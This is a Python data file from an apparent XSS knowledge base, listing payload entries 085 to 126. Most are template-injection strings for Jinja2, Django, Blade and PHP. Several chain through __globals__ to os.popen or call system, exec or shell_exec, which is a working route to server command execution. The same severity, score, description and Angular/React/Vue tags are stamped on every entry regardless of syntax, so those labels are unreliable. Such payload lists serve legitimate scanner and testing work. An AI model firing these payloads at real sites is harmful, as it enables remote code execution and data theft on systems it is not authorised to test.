#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Framework Specific Core Payloads - Part 3
"""

from typing import Dict

from ..models import PayloadEntry


FRAMEWORK_SPECIFIC_CORE_PAYLOADS_PART3: Dict[str, PayloadEntry] = {
    "framework_specific_085": PayloadEntry(
        payload="{{self}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_086": PayloadEntry(
        payload="{{request}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_087": PayloadEntry(
        payload="{{config.__class__.__init__.__globals__['os'].popen('alert(1)').read()}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_088": PayloadEntry(
        payload="{{request.__class__.__init__.__globals__['os'].popen('alert(1)').read()}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_089": PayloadEntry(
        payload="{{url_for.__globals__['os'].popen('alert(1)').read()}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_090": PayloadEntry(
        payload="{{request.application.__globals__.__builtins__.__import__('os').popen('alert(1)').read()}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_091": PayloadEntry(
        payload="{{lipsum.__globals__.os.popen('alert(1)').read()}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_092": PayloadEntry(
        payload="{{cycler.__init__.__globals__.os.popen('alert(1)').read()}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_093": PayloadEntry(
        payload="{{'<script>alert(1)</script>'|safe}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_094": PayloadEntry(
        payload="{{request.args.xss|safe}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_095": PayloadEntry(
        payload="{{request.args.callback}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_096": PayloadEntry(
        payload='" onclick="{{request.args.callback}}" "',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_097": PayloadEntry(
        payload="{{url_for(request.args.endpoint)}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_098": PayloadEntry(
        payload="{{redirect(request.args.url)}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_099": PayloadEntry(
        payload="{{7*7}}{{request.GET.callback}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_100": PayloadEntry(
        payload="{{block.super}}{{request.GET.xss}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_101": PayloadEntry(
        payload="{{user.password|safe}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_102": PayloadEntry(
        payload="{{request.GET.xss|safe}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_103": PayloadEntry(
        payload="{{value|safe}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_104": PayloadEntry(
        payload="{% url request.GET.view %}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_105": PayloadEntry(
        payload="{% load request.GET.lib %}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_106": PayloadEntry(
        payload="{{request.GET.callback|safe}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_107": PayloadEntry(
        payload="{% csrf_token %}{{request.GET.xss|safe}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_108": PayloadEntry(
        payload="{% include request.GET.template %}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_109": PayloadEntry(
        payload="{% extends request.GET.base %}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_110": PayloadEntry(
        payload="{% request.GET.tag %}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_111": PayloadEntry(
        payload="{% load request.GET.library %}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_112": PayloadEntry(
        payload="{!!request('xss')!!}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_113": PayloadEntry(
        payload="@{{request('xss')}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_114": PayloadEntry(
        payload='<?php echo "alert(1)"; ?>',
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_115": PayloadEntry(
        payload="{{phpinfo()}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_116": PayloadEntry(
        payload="{!!phpinfo()!!}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_117": PayloadEntry(
        payload="{!!$xss!!}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_118": PayloadEntry(
        payload="{!!request()->get('xss')!!}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_119": PayloadEntry(
        payload="{{url(request('callback'))}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_120": PayloadEntry(
        payload="{{route(request('route'))}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_121": PayloadEntry(
        payload="@json($xss)",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_122": PayloadEntry(
        payload="@component(request('component'))",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_123": PayloadEntry(
        payload="@include(request('view'))",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_124": PayloadEntry(
        payload="{{system('alert(1)')}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_125": PayloadEntry(
        payload="{{exec('alert(1)')}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
    "framework_specific_126": PayloadEntry(
        payload="{{shell_exec('alert(1)')}}",
        contexts=["html_content", "js_string"],
        severity="medium",
        cvss_score=5.5,
        description="Framework Specific payload",
        tags=["framework", "angular", "react", "vue"],
        waf_evasion=False,
    ),
}
